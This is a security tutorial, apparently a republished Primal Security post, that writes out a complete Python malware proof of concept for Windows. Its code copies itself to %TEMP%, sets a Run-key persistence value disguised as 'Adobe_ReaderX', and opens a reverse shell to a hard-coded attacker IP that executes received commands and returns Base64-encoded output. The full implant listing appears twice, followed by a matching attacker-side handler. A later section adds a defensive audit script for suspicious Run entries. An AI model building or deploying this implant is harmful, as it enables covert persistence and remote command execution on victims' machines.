0xC Python Tutorial: Python Malware


  • 8/19/2019 0xC Python Tutorial_ Python Malware


    This tutorial demonstrates some proof-of-concept code for creating malware using Python and PyInstaller. In a previous tutorial (http://www.primalsecurity.net/0x4-python-tutorial-exe/) we demonstrated how to compile a Python script into a Portable Executable (PE) using PyInstaller. Now let's demonstrate some quick proof-of-concept code that performs two malicious actions on a Windows host: gaining persistence and opening a reverse shell.

    Coding the Malware:



    One of the most common things you'll find with malware is that it wants to gain persistence on the victim. There are loads of ways to achieve persistence on Windows, one of the more common being to add a value under the following registry key:

    "Software\Microsoft\Windows\CurrentVersion\Run"

    The code below uses the HKEY_LOCAL_MACHINE copy of that key, whose values run whenever any user logs on. Writing to it requires administrative rights, so a payload running as a standard user would have to fall back to the HKEY_CURRENT_USER copy, which only fires for that one user. Below is the Python code to copy the program to the %TEMP% directory and then make the registry modification so the copy will execute when a user logs into the computer:

```python
import sys, base64, os, shutil, socket, subprocess
from winreg import *   # Python 3 module name; the 2014 listing used the Python 2 name _winreg

def autorun(tempdir, fileName, run):
    # Copy the executable to %TEMP%. The variable is expanded here so the registry value
    # below holds an absolute path instead of a literal "%TEMP%" stored as REG_SZ.
    tempdir = os.path.expandvars(tempdir)
    dest = os.path.join(tempdir, os.path.basename(fileName))
    shutil.copy(fileName, dest)

    # Query the Run key and store the existing value names in the runkey list
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except OSError:     # raised when there are no more values (WindowsError in Python 2)
        pass
    key.Close()

    # Set the autorun value if it is not already there. (The original listing checked for
    # 'Adobe ReaderX' but wrote 'Adobe_ReaderX', so it rewrote the value on every run.)
    if 'Adobe_ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE)   # fails without admin rights
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, dest)
            key.Close()
        except OSError:
            pass
```

    Now that we have copied this file over to the %TEMP% directory and set up persistence, we can execute the next portion of the code, the reverse shell. I leveraged a Python reverse shell released by TrustedSec (https://www.trustedsec.com/files/RevShell_PoC_v1.py) and made one modification: Base64 encode the network traffic:

```python
def shell():
    # Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', 443))   # hard-coded attacker address
    s.send(b'[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if not data:            # empty recv means the attacker closed the connection
            break
        cmd = data.decode(errors='replace').strip()
        if cmd == "quit":
            break
        # Run the command through the shell and return stdout + stderr, Base64 encoded
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value, stderr_value = proc.communicate()
        encoded = base64.b64encode(stdout_value + stderr_value)
        s.send(encoded)
        #s.send(stdout_value)   # the unencoded send from the original TrustedSec PoC
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = os.path.abspath(sys.argv[0])    # path of this (PyInstaller-built) executable
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()
```

    Now when this program executes it will open up a reverse shell back to the "attacker", which in this case is a hard-coded IP in the script, but it could just as easily be a domain name, or perhaps a host in the Amazon cloud. The original post includes a screenshot of the program executing on a Windows host and connecting back to the attacker; in the captured network traffic you can see that the command output is Base64 encoded.

    [Screenshot not reproduced in this copy.]
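    The tutorial only shows the implant side. The listener that drives it has to send commands and Base64-decode what comes back, and a defender reading a capture has to do the same decoding. The following is an added example, not code from the original post or from TrustedSec: a minimal handler that speaks the implant's protocol (banner, then recv command / send base64(stdout + stderr) until "quit"), exercised against an in-process mirror of the shell() loop over a socketpair so it runs with no listener or network. The constructed SAMPLE_WIRE_PAYLOAD is what one reply looks like on the wire; the host name "pc" and user "bob" in it are made up.

```python
import base64
import socket
import subprocess
import threading

# Constructed sample of one implant reply as seen on the wire: base64 of the output
# of "whoami" for a made-up user "bob" on a made-up host "pc" (b"pc\\bob\r\n").
SAMPLE_WIRE_PAYLOAD = b"cGNcYm9iDQo="


def decode_wire_payload(payload: bytes) -> bytes:
    """Decode one implant reply. The implant sends base64(stdout + stderr) with no framing."""
    return base64.b64decode(payload, validate=True)


def implant_session(sock: socket.socket) -> None:
    """Mirror of the tutorial's shell() loop over an already-connected socket
    (same protocol: banner, then recv command / send base64 reply until "quit")."""
    sock.sendall(b"[*] Connection Established!")
    while True:
        data = sock.recv(1024)
        if not data:
            break
        cmd = data.decode(errors="replace").strip()
        if cmd == "quit":
            break
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        out, err = proc.communicate()
        sock.sendall(base64.b64encode(out + err))
    sock.close()


def handler_session(sock: socket.socket, commands):
    """Attacker side: read the banner, send each command, decode each reply, end the session.
    Returns (banner, [decoded replies])."""
    banner = sock.recv(1024)
    replies = []
    for cmd in commands:
        sock.sendall(cmd.encode())
        replies.append(decode_wire_payload(sock.recv(65536)))
    sock.sendall(b"quit")
    sock.close()
    return banner, replies


def demo(commands=("echo hello from implant",)):
    """Run handler and implant in-process over a socketpair; the command runs in the local shell."""
    attacker_end, implant_end = socket.socketpair()
    worker = threading.Thread(target=implant_session, args=(implant_end,))
    worker.start()
    banner, replies = handler_session(attacker_end, commands)
    worker.join()
    return banner, replies


if __name__ == "__main__":
    banner, replies = demo()
    print(banner.decode())
    for r in replies:
        print(r.decode(errors="replace"), end="")
```

    Two consequences of the PoC's lack of message framing show up as soon as you write the other end: a reply larger than one socket read arrives split across recv() calls and fails to decode (a decoder run over a packet capture must reassemble the TCP stream first), and a command that produces no output results in a zero-byte send, which the handler cannot tell apart from "no reply yet". Real tooling length-prefixes or terminates each message for exactly these reasons.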


    Here is the full code:

```python
import sys, base64, os, shutil, socket, subprocess
from winreg import *   # Python 3 module name; the 2014 listing used the Python 2 name _winreg

def autorun(tempdir, fileName, run):
    # Copy the executable to %TEMP%. The variable is expanded here so the registry value
    # below holds an absolute path instead of a literal "%TEMP%" stored as REG_SZ.
    tempdir = os.path.expandvars(tempdir)
    dest = os.path.join(tempdir, os.path.basename(fileName))
    shutil.copy(fileName, dest)

    # Query the Run key and store the existing value names in the runkey list
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except OSError:     # raised when there are no more values (WindowsError in Python 2)
        pass
    key.Close()

    # If the autorun value "Adobe_ReaderX" isn't set, this will set it
    # (HKLM requires admin rights; the write fails silently otherwise)
    if 'Adobe_ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, dest)
            key.Close()
        except OSError:
            pass

def shell():
    # Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', 443))   # hard-coded attacker address
    s.send(b'[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if not data:            # empty recv means the attacker closed the connection
            break
        cmd = data.decode(errors='replace').strip()
        if cmd == "quit":
            break
        # Run the command through the shell and return stdout + stderr, Base64 encoded
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value, stderr_value = proc.communicate()
        encoded = base64.b64encode(stdout_value + stderr_value)
        s.send(encoded)
        #s.send(stdout_value)   # the unencoded send from the original TrustedSec PoC
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = os.path.abspath(sys.argv[0])    # path of this (PyInstaller-built) executable
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()
```
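    The persistence technique in this code leaves an artifact a defender can look for: a Run value whose image lives in a user-writable directory such as %TEMP%. The following is an added example, not code from the original post: audit logic that flags such entries, run here over a small set of constructed Run values (the names and paths are made up, except the Adobe_ReaderX entry the tutorial's autorun() writes) so it works on any platform, plus a winreg enumeration of both hives for use on a Windows host.

```python
import os
import sys

# Directory fragments (lower-case, backslash form) a legitimate autostart image should not live in.
USER_WRITABLE_HINTS = (
    "\\temp\\",
    "\\tmp\\",
    "\\users\\public\\",
    "\\downloads\\",
)

# Constructed sample entries in the shape (hive, value name, value data). The first is what
# the tutorial's autorun() writes; the rest are made up to look like ordinary Run entries.
SAMPLE_ENTRIES = [
    ("HKLM", "Adobe_ReaderX", r"%TEMP%\mw.exe"),
    ("HKLM", "SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe"),
    ("HKCU", "OneDrive", r'"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("HKCU", "Updater", r"C:\Users\bob\AppData\Local\Temp\svc.exe -s"),
]


def extract_image_path(value: str) -> str:
    """Return the executable path from a Run value, dropping arguments. Handles quoted paths."""
    v = value.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        return v[1:end] if end > 0 else v[1:]
    idx = v.lower().find(".exe")
    return v[:idx + 4] if idx != -1 else v.split(" ")[0]


def is_suspicious(value: str) -> bool:
    """True if the image is an unexpanded %TEMP%/%TMP% path or sits in a user-writable directory."""
    path = extract_image_path(value)
    lowered = path.lower()
    if "%temp%" in lowered or "%tmp%" in lowered:
        return True   # the PoC stores the variable literally; an unexpanded path here is itself odd
    expanded = os.path.expandvars(path).lower().replace("/", "\\")
    return any(hint in expanded for hint in USER_WRITABLE_HINTS)


def audit_entries(entries):
    """entries: iterable of (hive, name, value). Returns the subset worth a closer look."""
    return [(hive, name, value) for hive, name, value in entries if is_suspicious(value)]


def enumerate_run_keys():
    """Windows only: yield (hive, name, value) for every value under both Run keys."""
    import winreg   # imported here so the audit logic above also runs on non-Windows hosts
    run = r"Software\Microsoft\Windows\CurrentVersion\Run"
    for label, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE), ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            key = winreg.OpenKey(hive, run)
        except OSError:
            continue
        with key:
            i = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, i)
                except OSError:   # no more values
                    break
                yield label, name, str(data)
                i += 1


if __name__ == "__main__":
    entries = list(enumerate_run_keys()) if sys.platform == "win32" else SAMPLE_ENTRIES
    for hive, name, value in audit_entries(entries):
        print(f"[!] {hive}\\...\\Run\\{name} = {value}")
```

    On the sample set this flags Adobe_ReaderX (unexpanded %TEMP%) and Updater (an unquoted image under AppData\Local\Temp with arguments) and leaves the two entries under system and vendor directories alone. The hint list is a heuristic, not an allow-list: a Run value pointing somewhere unusual deserves a look at the file's signature and creation time rather than an automatic verdict.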


    Copyright 2012-2016 Primal Security | All Rights Reserved | Powered by Coffee
